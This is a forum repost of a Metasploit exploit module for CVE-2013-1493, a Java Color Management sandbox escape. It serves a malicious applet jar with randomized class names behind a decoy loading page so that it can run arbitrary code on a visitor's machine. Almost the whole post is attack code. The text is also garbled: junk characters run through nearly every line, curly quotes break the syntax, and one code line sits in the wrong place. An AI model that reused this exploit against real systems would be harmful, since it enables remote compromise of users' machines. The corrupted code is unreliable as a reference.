##3 @( D4 A9 Q7 V7 o7 B/ J+ E
* I5 C: Z6 y; ~' G0 r; e3 o; P
# This file is part of the Metasploit Framework and may be subject to
( N+ t7 H# c+ f# redistribution and commercial restrictions. Please see the Metasploit/ g- | y* D% z% \ J
# web site for more information on licensing and terms of use.
0 C7 E% n- o! ?. J( s9 M# http://metasploit.com/' N3 {5 z$ y, W1 k+ r. Q$ x
##
; y6 X6 J. Y$ c) p% brequire ‘msf/core’
. q( u- F9 ?+ D% Lrequire ‘rex’( |' K; z# I/ p( n$ Q K
class Metasploit3 < Msf::Exploit::Remote; i% V! A1 \ ?4 E3 D3 _; {
Rank = NormalRanking
" b7 k1 R2 ^( K9 Yinclude Msf::Exploit::Remote::HttpServer::HTML
- D! k2 K- L% b9 \/ |9 x$ e) Linclude Msf::Exploit::EXE+ b, W9 d. c9 C- N0 q- f6 z5 E, [
include Msf::Exploit::Remote::BrowserAutopwn
# h! W+ M6 D# @' t% k; b5 e+ b$ ^autopwn_info({ :javascript => false })
6 _+ d- L: S4 L) adef initialize( info = {} )
/ g& Y" }$ l( ^& }1 y$ usuper( update_info( info,$ u% Z# |# h; j2 h( R9 W# ^* b# y
‘Name’ => ‘Java CMM Remote Code Execution’,
0 ?. m! a# g) \+ O‘Description’ => %q{3 z" [1 ]9 n( i) G0 w* C" S
This module abuses the Color Management classes from a Java Applet to run
; d9 ~+ z- J( E: w( z; `arbitrary Java code outside of the sandbox as exploited in the wild in February
- ~: j6 i0 t" H; N. x8 V* aand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
; R: [; ~" C5 A* j' S0 fand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP13 }, V- ]! O: r
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
& ~! h. h. o1 M. _) Zwarning in order to run the malicious applet.5 n3 j, t4 ~2 j& G+ N& ~
},- e0 R r, ]9 {8 d" e
‘License’ => MSF_LICENSE,8 g# x$ W y3 F% |
‘Author’ =>! t- T) N+ v$ J* V- s5 A2 S& N
'Unknown', # Vulnerability discovery and Exploit1 h Z- Y% A& r( \ L/ M
'juan vazquez' # Metasploit module (just ported the published exploit)
& y" ^5 l% A# U" S],
: \% [* I- e2 R, T‘References’ =>
! A% V, e. Y, N( L& z[
3 T2 y" a0 Z+ \3 _/ `[ 'CVE', '2013-1493' ],; v& o2 m8 i; N* V+ W
[ 'OSVDB', '90737' ],5 z9 a* x( i; w
[ 'BID', '58238' ],
; b) j$ K6 L3 _5 X3 ?[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],3 q" G) u/ u2 W9 s: u) b; h; S
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],4 I! f, f5 Q$ I# y& O9 t% L0 A
[ 'URL', 'http://pastie.org/pastes/6581034' ]- Q; f W/ j. I; D
],9 o) Q9 v% k( P- c! y2 {" N
‘Platform’ => [ 'win', 'java' ],- N- c2 j6 O" Q
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },) }# @1 {( z" N: p+ H5 {+ @6 n
‘Targets’ =>
8 `0 F" X* R! m0 p. I[
7 \. d7 O* ?+ H, {* T5 p3 d[ 'Generic (Java Payload)',
- s- a; O' c7 t" Z# M# C. e/ @{6 f; }8 q3 f; p, z9 ~: @
'Platform' => 'java',: ], ~$ c$ N0 y* c& W$ ?
'Arch' => ARCH_JAVA
. F: i* r2 e$ ^}
# {" A! C/ ?/ `5 J" c: f7 u* U, v],
7 ^! U$ T, J+ G[ 'Windows x86 (Native Payload)',3 ~" e# u, H" {: v
{- `0 G+ @- U9 q. t" c( o6 H
'Platform' => 'win',
) a- f6 O5 ]- `7 {3 ['Arch' => ARCH_X867 i, b8 u/ L; ^, g; l
}
( Y8 t; v8 [2 r. ?: m; c]
- d& J9 ^. Y# V, q( Q. J],
$ `# j% O. a( \& t- \‘‘DisclosureDate’ => ‘Mar 01 2013′! u2 j9 I1 ]2 m% m
))
4 s# m8 B Q# {. s% r( Bend
( Z; k; K1 d. z/ |& b5 Cdef setup
' D1 M6 `. N" ^5 ?path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
6 [7 W3 |$ o# Z; B, `@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }6 j0 o+ W$ G* b; @, R, K- B: \& s
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
6 b) A1 w" {5 X+ W y* J! c: w+ @: `@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) } @' T2 O* J0 D" |# K2 J; `
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)6 y8 l9 T' n9 F1 I/ M
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }, J8 _* \' e! n% U5 t; e+ z1 `
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
( g. U) n4 M$ F2 S+ u4 |, v. R; _@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
& u, P- F$ n5 a. C7 Z* A8 f/ [* y@init_class_name = rand_text_alpha(“Init”.length)
j! G. W0 G2 g" e+ d@init_class.gsub!(“Init”, @init_class_name)
% O) L8 m3 ^4 S: q, tsuper
6 f' h$ k# t& fend$ m) D" t: t* C6 P0 b v6 w& W
def on_request_uri(cli, request)" v z( o F8 h% L$ t3 ~$ M: ?! W" E
print_status(“handling request for #{request.uri}”)0 O3 J. b* o$ s' h$ G/ O
case request.uri
8 a7 l4 M& d" V3 Q# h, T7 Lwhen /\.jar$/i' W# D$ I8 }% P: ]1 ^; f
jar = payload.encoded_jar' [) I$ t2 [' q0 S) m. p% i: ?
jar.add_file(“#{@init_class_name}.class”, @init_class)# ~. B3 x/ \3 O9 R; U8 H4 h( ]: G
jar.add_file(“Leak.class”, @leak_class)
! @, l5 L, Q. ]; qjar.add_file(“MyBufferedImage.class”, @buffered_image_class)) g* x6 _ F2 R! e$ I- R! g
jar.add_file(“MyColorSpace.class”, @color_space_class)
& R2 y* Z' S% tDefaultTarget’ => 1,8 X; e( U3 G/ C
metasploit_str = rand_text_alpha(“metasploit”.length)( Z/ N' j5 _- R2 F J0 \. U* N
payload_str = rand_text_alpha(“payload”.length)! `& \% [8 H7 I6 Z
jar.entries.each { |entry|- I% U' J( q9 s2 n
entry.name.gsub!(“metasploit”, metasploit_str): @7 P7 U0 i% U/ A! ^
entry.name.gsub!(“Payload”, payload_str)' S% ]6 ~# a5 a
entry.data = entry.data.gsub(“metasploit”, metasploit_str)- B2 d3 Z3 M8 S1 G% v4 t) t
entry.data = entry.data.gsub(“Payload”, payload_str)( W% B0 F( g# f: H5 y$ H, g
}6 A$ `7 ~6 P8 j7 L& q; |
jar.build_manifest
: e1 W0 W+ `6 |8 Gsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })3 ?$ T$ \) `6 h* ^
when /\/$/
" t- }0 s, H( k: G/ ~. _2 T, o; Dpayload = regenerate_payload(cli)
2 r$ b' E1 d! `9 Dif not payload( {2 t( k0 R8 X! ?9 e& f
print_error(“Failed to generate the payload.”)
3 q( W3 W4 f+ i( d4 c% Q3 Msend_not_found(cli)2 M8 {0 P6 f0 _0 A$ _
return! `3 j' l' A) a2 v$ ^
end H( _9 d& `6 F" W K% W
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
, B" e5 C6 D+ I, y, U9 ]else
6 l5 H% i; E; _send_redirect(cli, get_resource() + ‘/’, ”)% D4 M* T! E7 _4 H6 k$ L
end1 O7 `$ e2 L9 O# f4 V
end, ?4 w3 M: N6 K% B0 `
def generate_html
0 f, Y& G' D5 q) z# h" X& }html = %Q|<html><head><title>Loading, Please Wait…</title></head>|3 V. l) Y5 y& Y4 s2 F9 m) O4 p
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|5 F _& t( Z( q o3 `7 C
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|! ~1 R6 ?) f& A( D4 N5 Y- b8 f
html += %Q|</applet></body></html>|
1 u) Y$ C3 c* {& D1 Jreturn html9 q9 h+ R! k$ j% P3 P
end
* @' A0 C- b5 A1 H. T F2 lend- j1 E: t( v" M0 y! a, W
end4 [) H4 G. R4 q' |; ]0 _! q; i3 V+ m7 Y
|
发表于 2013-4-4 17:31:17
收藏
支持
反对